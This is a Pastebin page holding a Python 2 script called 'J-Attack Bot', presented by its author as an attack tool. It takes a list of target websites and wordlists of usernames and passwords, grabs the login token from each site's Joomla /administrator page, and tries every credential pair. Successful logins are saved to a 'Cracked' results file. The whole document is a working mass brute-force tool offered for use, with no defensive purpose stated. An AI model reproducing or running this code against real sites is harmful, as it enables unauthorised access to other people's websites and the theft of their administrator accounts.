Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/python
- # coding=utf-8
- import re,os
- try:
- import requests
- except:
- print "Please! Install Request Module"
- banner = '''
- ,--. ,--. ,--. ,--.
- | `.' |,--.--. | | ,---. | |,-. ,---. ,--.--.
- | |'.'| || .--',--. | || .-. || /| .-. :| .--'
- | | | || | | '-' /' '-' '| \ \\ --.| |
- `--' `--'`--' `-----' `---' `--'`--'`----'`--'
- ==========================================================
- || Welcome To J-Attack Bot - Version : 0.1 ( Python ) ||
- ==========================================================
- || Coded By : MrJoker - Libyan Attacker ||
- ==========================================================
- || Skype : live:mr9_9 - Face : 1337MrJoker ||
- ==========================================================
- '''
- fuck = raw_input('\n\t ===> Enter List Name <=== : ')
- listuser = raw_input("\t ===> Enter Your Username List <=== : ")
- listpass = raw_input("\t ===> Enter Your Password List <=== : ")
- class Jmbrute(object) :
- """
- Class to brute force joomla
- """
- def __init__(self, website, timeout=10) :
- self.website = website
- # Making a requests sesion object
- self.req = requests.session()
- self.timeout = timeout
- def __makeGet(self, url) :
- try :
- return self.req.get(url, timeout=self.timeout).text
- except :
- pass
- def getToken(self) :
- try :
- return re.search('<input type="hidden" name="(.*?)" value="1" />', self.__makeGet(self.website)).group(1)
- except :
- return False
- def trylogin(self, user, passwd, token) :
- dat = {
- 'username' : user,
- 'passwd' : passwd,
- token : '1',
- 'lang' : '',
- 'option' : 'com_login',
- 'task' : 'login',
- 'return' : 'aW5kZXgucGhw'
- }
- try :
- self.req.post(self.website, data=dat, timeout=self.timeout)
- except :
- pass
- def checklog(self) :
- res = self.__makeGet(self.website)
- if res : return 'logout' in res
- else : return False
- def file2list(fil) :
- with open(fil, 'r') as myfile :
- return myfile.read().split()
- def test(url):
- try:
- print "[!]-> Scanning : " + url
- userlist = file2list(listuser)
- passlist = file2list(listpass)
- brute(url,userlist,passlist)
- except:
- pass
- def brute(url,user,passw):
- try:
- site = url + "/administrator/index.php"
- for us in user:
- for passwd in passw:
- jm = Jmbrute(site)
- token = jm.getToken()
- if token:
- jm.trylogin(us, passwd, token)
- if jm.checklog():
- print '\n[*] Cracked', site, '\n[+] Username : ' + us, '\n[+] Password :', passwd + '\n'
- if not os.path.exists("Result"):
- os.mkdir("Result", 0755);
- logger(site, us, passwd, 'Result/Cracked.txt')
- break
- else:
- print "[-] Wrong Username : " + us + " And Wrong Password : " + passwd
- except:
- pass
- def logger(website, user, passwd, filename):
- with open(filename, 'a') as myfile:
- myfile.write('[*] Cracked ' + website + ' \n#Username : ' + user + ' \n#Password : ' + passwd + '\n')
- try:
- hello = open(fuck).readlines()
- print banner
- if (len(hello) > 0):
- for attack in hello:
- _attack = attack.rstrip()
- test(_attack)
- except:
- pass
Add Comment
Please, Sign In to add comment